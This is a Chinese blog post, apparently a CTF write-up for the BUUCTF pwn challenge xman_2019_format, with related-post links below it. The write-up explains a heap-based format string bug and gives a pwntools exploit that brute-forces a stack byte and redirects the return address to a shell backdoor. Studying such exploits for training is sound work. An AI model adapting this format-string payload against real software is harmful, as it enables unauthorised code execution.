xman_2019_format

最新推荐文章于 2025-05-10 09:55:35 发布
最新推荐文章于 2025-05-10 09:55:35 发布
阅读量120 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62887641/article/details/132549286
版权

xman_2019_format

非栈上格式化字符串

-----劫持ebp

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8046000)

32位,只开了nx

直接看主要的函数

char *sub_8048651()
{
  void *buf; // [esp+Ch] [ebp-Ch]

  puts("...");
  buf = malloc(0x100u);
  read(0, buf, 0x37u);
  return sub_804862A((char *)buf);
}

我们输入的内容,写在chunk里

char *__cdecl sub_80485C4(char *s)
{
  char *v1; // eax
  char *result; // eax

  puts("...");
  v1 = strtok(s, "|");
  printf(v1);
  while ( 1 )
  {
    result = strtok(0, "|");
    if ( !result )
      break;
    printf(result);
  }
  return result;
}

有格式化字符串漏洞,但不能使用栈的手法

发现后门函数

int sh()
{
  return system("/bin/sh");
}

思路就是利用栈上已有的数据,布下一个指向函数返回栈的指针,劫持返回栈

在这里插入图片描述

劫持返回栈,利用格式化字符串,改二级指针

from pwn import*
from Yapack import *

context(os='linux', arch='i386',log_level='debug')
r,elf=rec("node4.buuoj.cn",29271,"./pwn",10)

sh=0x80485AB
#gdb.attach(r,'b *0x80485f6')
for i in range(16):
    try:
        sl(b'%12c%10$hhn|%34219c%18$hn')
        break
    except:
        r.close()
        continue
#debug()
ia()

需要小爆破一下

然后解释一下各链子的变化

%12c%10$hhn      #12就是0xc,通过调试发现,这个地址都是c结尾,所以爆破就是这个原因
0xa(10)处:
0xffffcfc8 —▸ 0xffffcfe8 —▸ 0xffffd0ec
0x12(18)处:
0xffffcfe8 —▸ 0xffffd0ec —▸ 0x8048697
0x13(19)处:
0xffffd0ec —▸ 0x8048697

%34219c%18$hn	#34219就是0x85AB,改成后门函数的十进制
0xa(10)处:
0xffffcfc8 —▸ 0xffffcfe8 —▸ 0xffffd0ec
0x12(18)处:
0xffffcfe8 —▸ 0xffffd0ec —▸ 0x80485AB
0x13(19)处:
0xffffd0ec —▸ 0x80485AB

返回就是后门函数,getshell
在这里插入图片描述

BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1944
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
图片隐写 安恒ctf_图片隐写 安恒ctf_CTF中图片隐写的一些整理总结
weixin_35012535的博客
02-05 1872
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file...
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 630
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 699
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
这可以通过使用WASM解析工具如`wasm2wat`或` Binaryen`来完成,将二进制WASM转换为更易读的Wat(WebAssembly Text Format)格式。 2. 理解函数逻辑:WASM中的函数由操作码(opcodes)组成,这些操作码对应于基本的...
图片隐写 安恒ctf_CTF中图片隐写的一些整理总结
weixin_33626238的博客
12-30 2236
对历年来国内外CTF中常见的题型图片隐写的一些总结,本文长期更新,及时补充新的题型。对历年来国内外CTF中常见的题型图片隐写的一些总结赛题XMAN-qualifiers-2017 : Misc/SimpleGIf考察点Gif文件头隐写相关技巧Python 脚本编写工具010EditorLinux identify命令Visual Studio Code附件WriteupGIF头补全首先用file查...
全新UNICODE查表工具 —— Unicode XMan 2.0 (20120404)
04-25
——支持与FileFormat.info和Unicode.org网站的资源整合 ——支持字符特写浏览模式,显示后自动复制到粘贴板 ——支持下载字符对应区段的PDF文件,支持在线和离线模式 ——支持多种视图的打印预览,并自动复制...
Xman非常好用
07-30
请勿在未经授权的情况下上传任何涉及著作权侵权的资源,除非该资源完全由您个人创作
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
seaaseesa的博客
04-30 1597
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
m0_51251108的博客
11-10 773
xman_2019_format: 看名字是格式化字符串 checksec一下 在printf处 程序分析: 有个后门 想着就是把printf,劫持为后门
BUUCTF之“xman_2019_format”之特殊剧情:当格式化字符串遇上堆
Probeginner的博客
12-24 549
格式化字符串在遇到堆的情况
xmanctf_2019_crypto_cycle_write_up
WaterDemo22的专栏
12-31 651
一道xmanctf逆向题目的解答 周末试了试xmanctf的题目,试了一下crypto的cycle那一题,逻辑逆向难度不是很大。主要是对于逆向出来对逻辑,整理成解题思路的过程有点繁琐,需要对程序的精细化处理。分为三个步骤:编码、跳表处理和约束求解,具体分析如下。 编码 对输入字符进行编码,编码算法是: 关键逻辑是有两个: v2 = byte_202020[i] + v4 –s s[i]...
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
引言:Client Hello 为何是 HTTPS 安全的核心?
最新发布
2501_90994755的博客
05-10 294
Cipher Suites TLS_AES_256_GCM_SHA384 TLS 1.3 仅保留 5 个强密码套件,而 TLS 1.2 支持数十种(需谨慎过滤弱算法)openssl s_client -connect example.com:443 -tls1_3 # 手动测试 TLS 1.3。使用 TLS_RSA_WITH_3DES_EDE_CBC_SHA(3DES 算法已过时,易受 SWEET32 攻击)。欢迎在评论区分享经历!
7.2.安全防御
2301_79902294的博客
05-07 852
• 密码存储:BCrypt与Argon2算法实现(Spring Security) • 多因素认证(MFA):TOTP集成(Google Authenticator API) • 生物识别安全:活体检测与本地存储(Android Biometric API)• 数据库加密:透明数据加密(TDE)、字段级加密(Jasypt) • 文件存储安全:权限控制(Linux ACL)、客户端加密(WebCrypto API) • 备份与恢复策略:异地加密备份(AWS S3 + KMS)-- 身份证号 -->
中级注册安全工程师的《安全生产专业实务》科目如何选择专业?
m0_60557936的博客
05-07 487
中级注册安全工程师的《安全生产专业实务》有 7 个专业方向,选择时可考虑以下几个方面:
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值